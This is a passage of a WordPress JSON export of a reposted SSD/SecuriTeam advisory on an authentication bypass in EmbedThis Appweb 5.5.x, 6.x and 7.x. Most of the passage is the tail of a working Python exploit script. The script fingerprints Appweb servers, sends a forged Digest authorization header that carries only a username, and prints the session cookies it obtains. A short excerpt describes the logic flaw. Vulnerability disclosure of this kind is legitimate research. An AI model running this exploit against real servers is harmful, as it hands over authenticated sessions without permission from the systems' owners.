class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># EmbedThis GoAhead uses a similar headers configuration, let&#8217;s skip it explicitly<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">serv<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span> r.headers.get(\"Server\")<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-57\">&nbsp;&nbsp;&nbsp;&nbsp;if serv and \"GoAhead\" in serv:<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-58\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return False<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-59\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-60\">&nbsp;&nbsp;&nbsp;&nbsp;if test_digest(r):<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-61\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return \"digest\"<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-62\">&nbsp;&nbsp;&nbsp;&nbsp;elif test_form(r):<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-63\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return \"form\"<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-64\">&nbsp;&nbsp;&nbsp;&nbsp;return None<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-65\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-66\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-67\">def exploit(url, username=\"joshua\", authtype=\"digest\"):<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-68\">&nbsp;&nbsp;&nbsp;&nbsp;payload = { \"username\": username }<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-69\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-70\">&nbsp;&nbsp;&nbsp;&nbsp;headers = {<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-71\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"authorization\": \"Digest username={}\".format(username),<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-72\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"user-agent\": \"TruelBot\",<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-73\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"content-type\": \"application\/x-www-form-urlencoded\",<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-74\">&nbsp;&nbsp;&nbsp;&nbsp;}<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-75\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-76\">&nbsp;&nbsp;&nbsp;&nbsp;if authtype == \"digest\":<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-77\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;r = requests.get(url, data=payload, headers=headers)<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-78\">&nbsp;&nbsp;&nbsp;&nbsp;else:<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-79\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;r = requests.post(url, data=payload, headers=headers)<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-80\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-81\">&nbsp;&nbsp;&nbsp;&nbsp;print(r.content)<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-82\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-83\">&nbsp;&nbsp;&nbsp;&nbsp;if r.status_code != 200 or len(r.cookies) &lt; 1:<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-84\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(\"[!] Exploit failed, HTTP status code {}\".format(r.status_code))<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-85\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-86\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-87\">&nbsp;&nbsp;&nbsp;&nbsp;print(\"[*] Successfully exploited, here's your c00kie:\\n&nbsp;&nbsp;{}\".format(dict(r.cookies)))<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-88\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-89\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-90\">if __name__ == \"__main__\":<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-91\">&nbsp;&nbsp;&nbsp;&nbsp;parser = argparse.ArgumentParser(description=\"Test&amp;Exploit EmbedThis form\/digest authentication bypass (CVE-XXXX-YYYY)\")<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-92\">&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('-t', '--target', required=True, help=\"specify the target url (i.e., http(s):\/\/target-url[:port]\/)\")<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-93\">&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('-u', '--user', required=True, help=\"you need to know a valid user name\")<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-94\">&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('-c', '--check', action='store_true', default=False, help=\"test for exploitability without running the actual exploit\")<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-95\">&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('-f', '--force', action='store_true', default=False, help=\"skip exploitability test\")<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-96\">&nbsp;&nbsp;&nbsp;&nbsp;args = parser.parse_args()<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-97\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-98\">&nbsp;&nbsp;&nbsp;&nbsp;url = args.target<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-99\">&nbsp;&nbsp;&nbsp;&nbsp;username = args.user<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-100\">&nbsp;&nbsp;&nbsp;&nbsp;t = \"form\"  # default will try form\/post<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-101\">&nbsp;&nbsp;&nbsp;&nbsp;if args.check or not args.force:<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-102\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;t = test(url)<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-103\">&nbsp;<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-104\">&nbsp;&nbsp;&nbsp;&nbsp;if t is None:<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-105\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(\"[!] Target does not appear to be Appweb\/Embedthis HTTP with form\/post auth (force with -f)\")<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-106\">&nbsp;&nbsp;&nbsp;&nbsp;else:<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-107\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(\"[+] Potential appweb\/embedthis http, {} method\".format(t))<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-108\">&nbsp;<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-109\">&nbsp;&nbsp;&nbsp;&nbsp;if not args.check:<\/div>\n
<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-110\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(\"[!] Exploiting {}, user {}!\".format(url, username))<\/div>\n
<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-111\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exploit(url, username, t)<\/div>\n
<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3676\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 14 Mar 2018 19:01:53 +0000<\/strong><\/p>\n<p>Vulnerability Summary A critical vulnerability in the EmbedThis HTTP library, and Appweb versions 5.5.x, 6.x, and 7.x including the latest version present in the git repository. 
In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for form and digest login types. Confirmed Vulnerable Appweb version &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3676\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; AppWeb Authentication Bypass (Digest, Basic and Forms)<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136],"class_list":["post-11742","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11742","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11742"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11742\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templ
ated":true}]}}